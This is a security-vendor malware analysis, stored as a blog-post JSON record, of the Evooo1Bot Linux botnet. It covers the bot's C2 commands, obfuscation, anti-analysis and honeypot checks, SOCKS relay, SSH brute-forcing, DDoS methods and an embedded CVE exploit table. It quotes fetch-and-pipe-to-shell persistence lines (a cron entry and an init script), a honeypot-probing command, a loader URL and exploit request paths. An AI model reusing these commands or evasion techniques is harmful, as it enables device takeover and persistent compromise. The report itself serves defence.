{"id":26143,"date":"2026-09-21T13:06:07","date_gmt":"2026-09-21T21:06:07","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2026\/09\/21\/multi-functional-linux-botnet-evooo1bot-3\/"},"modified":"2026-09-21T13:06:07","modified_gmt":"2026-09-21T21:06:07","slug":"multi-functional-linux-botnet-evooo1bot-3","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2026\/09\/21\/multi-functional-linux-botnet-evooo1bot-3\/","title":{"rendered":"Multi-Functional Linux Botnet \u201cEvooo1Bot\u201d"},"content":{"rendered":"<div class=\"Table-Content aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"blog-toc\">\n<div class=\"b3-blog-list__row\">\n<div class=\"b3-blog-list__column-left table-content-wrapper automatic\">\n<ul class=\"table-of-content\">\n<li class=\"header\"><img decoding=\"async\" alt=\"\" class=\"toc-icon\" src=\"\/content\/dam\/fortinet\/images\/toc-icon.jpg\"\/>Article Contents<\/li>\n<\/ul>\n<\/div>\n<div class=\"aem-GridColumn aem-GridColumn--default--8 b3-blog-list__column-right scrolling-content automatic\">\n<div class=\"b15-blog-meta__container text-container\">\n<span>By <\/span><br \/>\n<span class=\"b15-blog-meta__author\"><br \/>\n<a href=\"\/blog\/search?author=Cara+Lin\">Cara Lin<\/a><br \/>\n<\/span><br \/>\n<span class=\"b15-blog-meta__\"><br \/>\n<\/span><br \/>\n<span class=\"b15-blog-meta__date\"> | August 13, 2026<\/span>\n<\/div>\n<div class=\"C875-Disclaimer\">\n<\/div>\n<div class=\"raw-import\">\n<div class=\"text-container\"><\/div>\n<\/div>\n<div class=\"cmp cmp-text\">\n<p style=\"\tmargin-left: 80.0px;\n\"><b>Affected Platforms: <\/b>Linux<br \/>\n<b>Impacted Users: <\/b>Any organization<br \/>\n<b>Impact: <\/b>Remote attackers gain control of the vulnerable systems<br \/>\n<b>Severity Level: <\/b>Critical<\/p>\n<p>FortiGuard Labs has been tracking a previously undocumented Linux botnet family, which we have named <b>Evooo1Bot<\/b>. The name derives from the hardcoded string \u201cevooo1\u201d found in every binary. While the malware reuses the DDoS engine from the publicly leaked Mirai source code, it extends the original framework with numerous capabilities, including encrypted C2 communications, an SSH brute-force scanner, a SOCKS relay module, a credential sniffer, and an integrated exploit arsenal targeting multiple known vulnerabilities. Telemetry from its command-and-control infrastructure indicates that Evooo1Bot has been actively targeting Internet-facing devices since July 2026, exploiting multiple vulnerabilities across diverse regions. In this article, we provide a detailed analysis of Evooo1Bot\u2019s modular architecture and operational features.<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 1: C2 Telemetry<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<h2>Discovery<\/h2>\n<p>Evooo1Bot came to our attention through FortiGuard IPS telemetry. We observed active exploitation attempts targeting a range of edge devices, with all payload callbacks pointing to the same loader URL at 91.92.40[.]118\/wget.sh. The following vulnerabilities were observed being exploited across the captured traffic:<\/p>\n<ul>\n<li>CVE-2007-3010: Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability<\/li>\n<li>CVE-2016-6277: NETGEAR Multiple Routers Remote Code Execution Vulnerability<\/li>\n<li>CVE-2018-14558: Tenda AC7, AC9, and AC10 Routers Command Injection Vulnerability<\/li>\n<li>CVE-2019-14931: Mitsubishi Electric Europe B.V. ME-RTU devices and INEA ME-RTU devices remote Command Injection vulnerability<\/li>\n<li>CVE-2020-10987: Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability<\/li>\n<li>CVE-2021-46422: Telesquare SDT-CW3B1 Command Injection vulnerability<\/li>\n<li>CVE-2022-37055: D-Link Routers Buffer Overflow Vulnerability<\/li>\n<li>CVE-2024-29269, Telesquare TLR-2005KSH Command Injection Vulnerability<\/li>\n<li>CVE-2025-10123, D-Link DIR-823X Command Injection Vulnerability<\/li>\n<li>CVE-2025-55583: D-Link DIR-868L B1 router Command Injection Vulnerability<\/li>\n<\/ul>\n<p>The loader script wget.sh downloads and executes a botnet binary that matches the host\u2019s CPU architecture. Each exploitation attempt carries a campaign label embedded in the download command (for example, <b>-s mitsu <\/b>for Mitsubishi Electric targets and <b>rep.alcatel<\/b> for Alcatel-Lucent targets), indicating that the operator independently tracks per-vulnerability infection yield.<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n-->\n<\/div>\n<div class=\"cmp cmp-text\">\n<p class=\"cq-text-placeholder-ipe\" data-emptytext=\"Text\">\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 2: Payload in exploit pcap<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<p>Then the loader script <b>wget.sh<\/b> downloads 12 binary variants using <b>wget<\/b>, <b>busybox wget<\/b>, <b>curl<\/b>, or <b>tftp<\/b>, in that order. The binary is written to a temporary path, made executable, and executed. Bash history is cleared post-infection.<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 3: wget.sh<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<h2>Basic Sample Identification<\/h2>\n<p>Static strings in Evooo1Bot are protected by a multi-layer pipeline applied at compile time. The same decryption procedure handles more than 60 encrypted string blocks. The AES and ChaCha20 keys are not stored directly in the binary. Each key is split into two 32-byte constants embedded in<b> .data<\/b> and combined at runtime via XOR.<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 4: Encrypted string<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<p class=\"cq-text-placeholder-ipe\" data-emptytext=\"Text\">\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 5: Decrypted string<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<p>Another XOR decoding procedure is applied to a subset of strings in the<b> .rodata<\/b> section (0x43 in the i386 build).<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 6: XOR-encoded string<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<p>At startup, the binary checks for the presence of analysis tooling before continuing:<\/p>\n<ul>\n<li>Filesystem presence check: strace, ltrace, gdb, lldb, valgrind, perf, radare2, r2, rizin, cutter, iaito, ghidra, ghidraRun, ida, ida64, idat, idat64, objdump, readelf, retdec-decompiler, wireshark, tshark, tcpdump, ngrep, ettercap, yara, ssdeep, binwalk, foremost, sysdig, bpftrace, auditd, ausearch, fatrace, inotifywait, lynis, rkhunter, chkrootkit, clamdscan, clamscan, volatility, vol.py, and gcore<\/li>\n<li>Running process name check: gdb, lldb, strace, ltrace, radare2, r2, rizin, rr, valgrind, perf, ida, ida64, ghidra, sysdig, bpftrace, frida, and frida-server<\/li>\n<li>Sandbox service name check: sandboxie, cuckoo, anubis, threatexpert, joebox, comodo, hybrid-analysis, cape-sandbox, fireeye, normanbox, and drakvuf.<\/li>\n<li>VM and container environment fingerprints check: vmware, vbox, virtualbox, qemu, firejail, bubblewrap, gvisor, kata, cuckoo, joesandbox, cape, any.run, and hybrid-analysis.<\/li>\n<\/ul>\n<p>Once the checks pass, it begins establishing a connection with the C2 server on port 443. This port is chosen to blend in with expected HTTPS traffic at the network perimeter. After checking in with the C2 server, it waits for further commands to take action.<\/p>\n<h2>Functional Modules<\/h2>\n<p>Evooo1Bot is embedded with multiple commands and can be separated into the following modules. (<b>Note:<\/b> This is based on the latest version. The earlier build supports all commands except <b>!cve<\/b>, <b>!stopcve<\/b>, and <b>!cveall<\/b>.)<\/p>\n<p>\u00a0<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" class=\"details-tbl\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"20%\"><b>Module<\/b><\/td>\n<td width=\"20%\"><b>Commands<\/b><\/td>\n<td width=\"60%\"><b>Description<\/b><\/td>\n<\/tr>\n<tr>\n<td>Persistence<\/td>\n<td>!persist<\/td>\n<td>Installs all persistence mechanisms<\/td>\n<\/tr>\n<tr>\n<td>Self-Update<\/td>\n<td>!reinstall<\/td>\n<td>Downloads and replaces the running binary<\/td>\n<\/tr>\n<tr>\n<td>Control<\/td>\n<td>!kill<br \/>\n!exit<br \/>\n!info<\/td>\n<td>Terminate bot, exit gracefully, or return system info<\/td>\n<\/tr>\n<tr>\n<td>File Transfer<\/td>\n<td>!download<br \/>\n!upload<\/td>\n<td>Bidirectional; download limit 10 MB; delimited by <b>__FILE_START__<\/b> and\u00a0 <b>__FILE_END__<\/b> markers<\/td>\n<\/tr>\n<tr>\n<td>Interactive Shell<\/td>\n<td>!shell<br \/>\n!exec<br \/>\n!stream<br \/>\n!detach !bg<\/td>\n<td>Opens \/dev\/ptmx PTY, sets TERM=xterm-256color, and supports background execution and detach<\/td>\n<\/tr>\n<tr>\n<td>Sniffer<\/td>\n<td>!sniff<br \/>\n!stopsniff<\/td>\n<td>Reads \/proc\/net\/tcp, intercepts HTTP Basic Authorization and Cookie headers, and writes to \/tmp\/.sniff.log<\/td>\n<\/tr>\n<tr>\n<td>SOCKS Relay<\/td>\n<td>!socks<br \/>\n!socksauth<br \/>\n!stopsocks<\/td>\n<td>Converts victim into proxy node with optional authentication and relays arbitrary TCP traffic<\/td>\n<\/tr>\n<tr>\n<td>SSH Scanner<\/td>\n<td>!ssh<br \/>\n!stopssh<br \/>\n!enableautossh<br \/>\n!disableautossh<\/td>\n<td>Built-in SSH client and contents150+ entry credential dictionary<\/td>\n<\/tr>\n<tr>\n<td>DDoS<\/td>\n<td>!attack<br \/>\n!stopattack<\/td>\n<td>16 flood methods<\/td>\n<\/tr>\n<tr>\n<td>CVE Exploit<\/td>\n<td>!cve<br \/>\n!stopcve<br \/>\n!cveall<\/td>\n<td>HTTP-based exploit dispatcher with operator-supplied payload host. (MODE:all for concurrent sweep)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>We provide further explanation of the \u201cPersistence,\u201d \u201cSOCKS Relay,\u201d \u201cSSH Scanner,\u201d \u201cDDoS,\u201d and \u201cCVE Exploit\u201d modules in the following sections.<\/p>\n<h2>Persistence Mechanisms<\/h2>\n<p>The <b>!persist<\/b> command installs all mechanisms simultaneously.<\/p>\n<ul>\n<li>systemd service: sets up a unit file with \u201cDescription=Apache HTTPD Cache Manager\u201d and \u201cRestart=always.\u201d<\/li>\n<li>SysV init script: installs in path \/etc\/init.d with the header \u201c### BEGIN INIT INFO\u201d with the downloading script \u201c(wget -qO- &lt;URL&gt; || curl -sL &lt;URL&gt;) | \/bin\/sh &gt; \/dev\/null 2&gt;&amp;1 &amp;.\u201d<i><\/i><\/li>\n<li>Cron: sets a scheduled task with an entry to download the script every 5 minutes:<\/li>\n<\/ul>\n<p style=\"\tmargin-left: 80.0px;\n\"><i>*\/5 * * * * \/bin\/sh -c &#8216;(wget -qO- &lt;URL&gt; || curl -sL &lt;URL&gt;) | \/bin\/sh &gt; \/dev\/null 2&gt;&amp;1 &amp;&#8217;<\/i><\/p>\n<ul>\n<li>Shell profile: \/etc\/profile.d\/ injection executed on login.<\/li>\n<li>rc.local: appends script to download the script in \u201c\/etc\/rc.local.\u201d<\/li>\n<\/ul>\n<p>To resist termination, the binary writes to \/proc\/self\/oom_score_adj to reduce the OOM-killer\u2019s priority and keeps \/dev\/watchdog open to prevent a device reboot from interrupting the operation.<\/p>\n<h2>SOCKS relay<\/h2>\n<p>Unlike typical botnet commands that focus on downloading payloads or launching attacks, the <b>!socks<\/b> module turns an infected host into a SOCKS5 proxy that the operator can use as a network relay. It supports two operating modes. In direct mode, it opens a SOCKS5 listener on the infected host on the default TCP port 1080 and waits for incoming client connections. The implementation first attempts to create a dual-stack IPv6 listener and falls back to IPv4 if that fails. Each accepted client is then passed to the session handler for proxying.<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 7: SOCKS relay<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<p>The botnet also implements a reverse relay mode. Instead of exposing a listening port, the bot establishes an outbound encrypted connection to an operator-specified relay server. This persistent control channel listens for commands such as <b>RELAY_NEW:&lt;session_id&gt;,<\/b> which indicate that a new proxy session should be created.<\/p>\n<p>Upon receiving the request, the bot opens a second encrypted connection to the same relay server, registers it using <b>RELAY_DATA:&lt;session_id&gt;<\/b>, and hands the connection to the SOCKS5 proxy routine. This architecture separates session control from proxy traffic, allowing multiple sessions to run independently while maintaining a stable control connection.<\/p>\n<p>This capability significantly increases the value of an infected host to attackers. The victim&#8217;s IP address can be used to disguise malicious traffic, bypass geographic restrictions, or provide access to internal networks through an already compromised machine. In larger botnets, the same functionality could also be used to build a distributed proxy infrastructure, enabling anonymous traffic forwarding or monetization through residential and enterprise proxy services.<b><\/b><\/p>\n<h2>SSH Brute-Force<\/h2>\n<p>Before attempting to start the scanner, it performs two honeypot checks at different stages of the connection. The first check occurs during the protocol handshake, before any credentials are submitted. The scanner compares the target&#8217;s SSH banner against a hardcoded list shown in the table below. A match on any entry causes the target to be silently skipped without logging or further interaction.<\/p>\n<p>\u00a0<\/p>\n<p><center><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" class=\"details-tbl\" width=\"80%\">\n<tbody>\n<tr>\n<td>Cowrie<\/td>\n<td>SSH-2.0-paramiko<\/td>\n<td>SSH-2.0-Go<\/td>\n<\/tr>\n<tr>\n<td>Kippo<\/td>\n<td>SSH-2.0-libssh<\/td>\n<td>SSH-2.0-Parks<\/td>\n<\/tr>\n<tr>\n<td>HonSSH<\/td>\n<td>Twisted<\/td>\n<td>SSH-2.0-CISCO_WLC<\/td>\n<\/tr>\n<tr>\n<td>Glutton<\/td>\n<td>russh_<\/td>\n<td>SSH-2.0-Server<\/td>\n<\/tr>\n<tr>\n<td>OpenCanary<\/td>\n<td>ssh2js<\/td>\n<td>SSH-2.0-MocanaSSH<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center><\/p>\n<p>The second check runs after a successful login, before the persistence payload is delivered. The scanner issues the following command over the established session:<\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><i>cat \/proc\/version 2&gt;\/dev\/null; echo &#8212;; cat \/proc\/1\/cmdline 2&gt;\/dev\/null; ls \/opt\/cowrie \/home\/cowrie \/home\/kippo 2&gt;\/dev\/null<\/i><\/p>\n<p>The version output is checked for the substring Linux version. If it is absent, it indicates an emulated or non-standard environment and causes the target to be skipped. The <b>ls<\/b> command detects two honeypot families: Cowrie and Kippo. If any indicator is found, the scanner abandons the target. Only hosts that pass all three conditions proceed to payload delivery.<\/p>\n<p>The two checks are complementary rather than redundant. The banner check filters out honeypots that announce themselves through their SSH implementation identifier. The post-login probe targets honeypots that present a plausible SSH banner but expose themselves through the underlying host\u2019s file system layout. Targets that pass both checks proceed to payload delivery.<\/p>\n<p>Then the built-in SSH scanner uses an SSH client implementation with the banner \u201cSSH-2.0-OpenSSH_9.7p1.\u201d The embedded credential dictionary contains over 150 entries. Beyond typical IoT default credentials, the list includes service account names (jenkins, postgres, oracle, nagios, deploy) that are more common in enterprise and operations-technology environments than on consumer routers.<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 8: Hard-coded credential<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<h2>DDoS Attack Method<\/h2>\n<p>The DDoS engine is structurally consistent with the publicly leaked Mirai source code. The HTTP flood variant (triggered by the http method key in the !attack parameter string) supports operator-specified METHOD, HEADER, and EXPECT values and constructs requests with a customizable User-Agent and Content-Length.<\/p>\n<p>\u00a0<\/p>\n<p><center><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" class=\"details-tbl\" width=\"80%\">\n<tbody>\n<tr>\n<td><b>ID<\/b><\/td>\n<td><b>Method<\/b><\/td>\n<td><b>Description<\/b><\/td>\n<\/tr>\n<tr>\n<td>0x00<\/td>\n<td>udp<\/td>\n<td>Generic UDP flood<\/td>\n<\/tr>\n<tr>\n<td>0x01<\/td>\n<td>vse<\/td>\n<td>Valve Source Engine query amplification<\/td>\n<\/tr>\n<tr>\n<td>0x02<\/td>\n<td>dns\n<\/td>\n<td>DNS flood<\/td>\n<\/tr>\n<tr>\n<td>0x03<\/td>\n<td>syn<\/td>\n<td>TCP SYN flood<\/td>\n<\/tr>\n<tr>\n<td>0x04<\/td>\n<td>ack<\/td>\n<td>TCP ACK flood<\/td>\n<\/tr>\n<tr>\n<td>0x05<\/td>\n<td>stomp<\/td>\n<td>TCP STOMP<\/td>\n<\/tr>\n<tr>\n<td>0x06<\/td>\n<td>greip<\/td>\n<td>GRE-encapsulated IP flood<\/td>\n<\/tr>\n<tr>\n<td>0x07<\/td>\n<td>greeth<\/td>\n<td>GRE-encapsulated Ethernet flood<\/td>\n<\/tr>\n<tr>\n<td>0x08<\/td>\n<td>udpplain<\/td>\n<td>High-PPS UDP, minimal header overhead<\/td>\n<\/tr>\n<tr>\n<td>0x09<\/td>\n<td>std<\/td>\n<td>UDP flood with random-length payload<\/td>\n<\/tr>\n<tr>\n<td>0x0a<\/td>\n<td>xmas<\/td>\n<td>TCP with all flags set<\/td>\n<\/tr>\n<tr>\n<td>0x0b<\/td>\n<td>usyn<\/td>\n<td>URG+SYN variant<\/td>\n<\/tr>\n<tr>\n<td>0x0c<\/td>\n<td>tcpall<\/td>\n<td>TCP with arbitrary flag combinations<\/td>\n<\/tr>\n<tr>\n<td>0x0d<\/td>\n<td>tcpfrag<\/td>\n<td>Fragmented TCP flood<\/td>\n<\/tr>\n<tr>\n<td>0x0e<\/td>\n<td>ovh<\/td>\n<td>Technique designed to bypass OVH DDoS mitigation<\/td>\n<\/tr>\n<tr>\n<td>0x0f<\/td>\n<td>asyn<\/td>\n<td>Asynchronous SYN flood<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center><\/p>\n<h2>CVE Exploit Module<\/h2>\n<p>The exploit module contains a plaintext CVE table embedded in the binary, with each entry mapping a CVE identifier to one or more HTTP request strings. It provides the payload host at runtime via <b>!cve &lt;url&gt;<\/b> or <b>!cveall &lt;url&gt; <\/b>and substitutes it into the wget delivery command. All exploit entries use the same delivery method. The tables below list the vulnerabilities and URI paths extracted from the botnet.<\/p>\n<p>\u00a0<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" class=\"details-tbl\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"30%\"><b>CVE Number<\/b><\/td>\n<td width=\"30%\"><b>Target Product<\/b><\/td>\n<td width=\"40%\"><b>Path<\/b><\/td>\n<\/tr>\n<tr>\n<td>CVE-2021-36260<\/td>\n<td>Hikvision IP Camera<\/td>\n<td>\/SDK\/webLanguage<\/td>\n<\/tr>\n<tr>\n<td>CVE-2022-26134<\/td>\n<td>Atlassian Confluence<\/td>\n<td>\/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils<\/td>\n<\/tr>\n<tr>\n<td>CVE-2022-30525<\/td>\n<td>Zyxel Firewall<\/td>\n<td>\/ztp\/cgi-bin\/handler<\/td>\n<\/tr>\n<tr>\n<td>CVE-2023-1389<\/td>\n<td>TP-Link Archer AX21<\/td>\n<td>\/cgi-bin\/luci\/;stok=\/locale<\/td>\n<\/tr>\n<tr>\n<td>CVE-2024-4577<\/td>\n<td>PHP-CGI (Windows)<\/td>\n<td>allow_url_include%3D<\/td>\n<\/tr>\n<tr>\n<td>CVE-2024-10914<\/td>\n<td>D-Link NAS<\/td>\n<td>\/cgi-bin\/account_mgr.cgi<\/td>\n<\/tr>\n<tr>\n<td>CVE-2025-1974<\/td>\n<td>Kubernetes ingress-nginx<\/td>\n<td>\/apis\/networking\/v1\/ingresses<\/td>\n<\/tr>\n<tr>\n<td>CVE-2022-29464<\/td>\n<td>WSO2 products<\/td>\n<td>\/fileupload\/<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The botnet contains some entries with implementation errors that prevent successful exploitation. In each case, the code does not replicate the actual attack vector. Either the vulnerability type is incompatible with command injection, or the target has no exposed interface that matches the request. These are non-exploitable as shipped. Take CVE-2023-34362 as an example. This vulnerability targets MOVEit Transfer. It has been reported that after exploitation, the threat actors deploy a web shell with filenames such as \u201chuman2.aspx.\u201d However, this exploit module doesn\u2019t execute the file upload procedure but only passes a payload argument to \u201chuman2.aspx.\u201d<\/p>\n<\/div>\n<div class=\"cmp cmp-image\">\n<p><!--\n\n<div class=\"enlarge-btn\" data-sly-test=\"\">\n\n<div class=\"gg-maximize-alt\"><\/div>\n\n \n\n<div>Click to Enlarge<\/div>\n\n<\/div>\n\n--><br \/>\n<span class=\"cmp-image--title\">Figure 9: Payload for CVE-2023-34362<\/span>\n<\/div>\n<div class=\"cmp cmp-text\">\n<h2>Conclusion<\/h2>\n<p>Evooo1Bot is a Linux botnet family that incorporates the Mirai DDoS engine into a significantly more capable and modular framework. Beyond traditional botnet functionality, it features encrypted C2 communications, multiple layers of string obfuscation using AES-256-CTR, ChaCha20, and XOR-based key derivation, as well as a 28-command remote administration interface. These capabilities place Evooo1Bot well beyond the technical baseline of conventional Mirai-derived malware.<\/p>\n<p>In addition to its attack modules, Evooo1Bot includes an integrated exploit arsenal targeting multiple known vulnerabilities across IoT devices, networking equipment, and enterprise applications. Among its capabilities, the reverse SOCKS relay module is arguably the most operationally significant. By transforming a compromised router, firewall, IP camera, or other edge device into a persistent proxy, the malware enables attackers to conceal their true origin, pivot into internal networks, and conduct follow-on operations through the victim&#8217;s infrastructure.<\/p>\n<p>Organizations should prioritize timely patching of Internet-facing devices and network appliances to reduce exposure to exploitation. Regular firmware updates, continuous monitoring for suspicious outbound connections, and prompt remediation of vulnerable systems remain essential to minimizing the risk posed by botnets such as Evooo1Bot.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>The malware described in this report is detected and blocked by FortiGuard Antivirus as:<\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>Linux\/Agent.BDS!tr<\/b><\/p>\n<p>The <a aria-label=\"FortiGuard AntiVirus service\" href=\"\/support\/support-services\/fortiguard-security-subscriptions\/antivirus\" title=\"FortiGuard AntiVirus service\">FortiGuard AntiVirus service<\/a> engine is integrated into <a aria-label=\"FortiGate\" href=\"\/products\/next-generation-firewall\" title=\"FortiGate\">FortiGate<\/a>, <a aria-label=\"FortiMail\" href=\"\/products\/email-security\" title=\"FortiMail\">FortiMail<\/a>, <a aria-label=\"FortiClient\" href=\"\/products\/endpoint-security\/forticlient\" title=\"FortiClient\">FortiClient<\/a>, and <a aria-label=\"FortiEDR\" href=\"\/products\/endpoint-security\/fortiedr\" title=\"FortiEDR\">FortiEDR<\/a>. Customers running these products with up-to-date signatures are protected against the malware components described in this report.<\/p>\n<p>The <a aria-label=\"FortiGuard Web Filtering Service\" href=\"https:\/\/www.fortiguard.com\/services\/wf\" rel=\"noopener noreferrer\" target=\"_blank\" title=\"FortiGuard Web Filtering Service\">FortiGuard Web Filtering Service<\/a> blocks the C2 server.<\/p>\n<p>FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:<\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2007-3010: alcatel-lucent.omnipcx.office.mastercgi.user.command.execution<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2016-6277: NETGEAR.WebServer.Module.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2018-14558 and CVE-2020-10987: Tenda.AC15.AC1900.Authenticated.Remote.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2019-14931: mitsubishi.electric.me-rtu.command.injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2021-36260: Hikvision.Products.SDK.WebLanguage.Tag.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2021-46422 and CVE-2024-29269: Telesquare.SDT-CW3B1.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2022-26134: HTTP.URI.Java.Expression.Language.Code.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2022-29464: WSO2.fileupload.Arbitrary.File.Upload<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2022-30525: Zyxel.Firewall.ZTP.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2022-37055: D-link.go-rt-ac750.hnap_main.buffer.overflow<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2023-1389: TP-Link.Archer.AX21.luci.stok.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2024-10914: D-Link.Devices.account_mgr.cgi.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2024-4577: PHP.CGI.Argument.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2025-10123: D-Link.DIR-823X.set_static_leases.Command.Injection<\/b><\/p>\n<p style=\"\tmargin-left: 40.0px;\n\"><b>CVE-2025-55583: D-Link.DIR-868L.fileaccess.cgi.Command.Injection<\/b><\/p>\n<p>Organizations seeking to strengthen foundational security awareness may also consider completing <a aria-label=\"Fortinet Certified Fundamentals\" href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=fcf_cybersecurity\" rel=\"noopener noreferrer\" target=\"_blank\" title=\"Fortinet Certified Fundamentals\">Fortinet Certified Fundamentals<\/a> (FCF) training in Cybersecurity.\u00a0 This module is designed to help end users learn to identify and protect themselves from phishing attacks.<\/p>\n<p>The <a aria-label=\"FortiGuard IP Reputation and Anti-Botnet Security Service\" href=\"\/support\/support-services\/fortiguard-security-subscriptions\/ipreputation-antibot\" title=\"FortiGuard IP Reputation and Anti-Botnet Security Service\">FortiGuard IP Reputation and Anti-Botnet Security Service<\/a> proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet\u2019s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.<\/p>\n<p>If you believe this or any other cybersecurity threat has impacted your organization, contact our Global <a aria-label=\"FortiGuard Incident Response Team\" href=\"https:\/\/www.fortiguard.com\/faq\/csirt-contact\" rel=\"noopener noreferrer\" target=\"_blank\" title=\"FortiGuard Incident Response Team\">FortiGuard Incident Response Team<\/a> for assistance.<\/p>\n<h2>IOCs<\/h2>\n<h3>IP<\/h3>\n<p>91.92.40[.]118<\/p>\n<h3>Hashes<\/h3>\n<p>f13cb360768363d3424e2192c7805b8c8015eb8706dbbbcdead6aed8cf390109<br \/>\n4c0886349e9d348569fffe1b7a31e474d514508bf0cd6f1e5dd99c2a73525e4d<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Affected Platforms: Linux<br \/>\nImpacted Users: Any organization<br \/>\nImpact: Remote attackers gain control of the vulnerable systems<br \/>\nSeverity Level: Critical<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378,32774],"tags":[],"class_list":["post-26143","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security","category-threats"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/26143","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/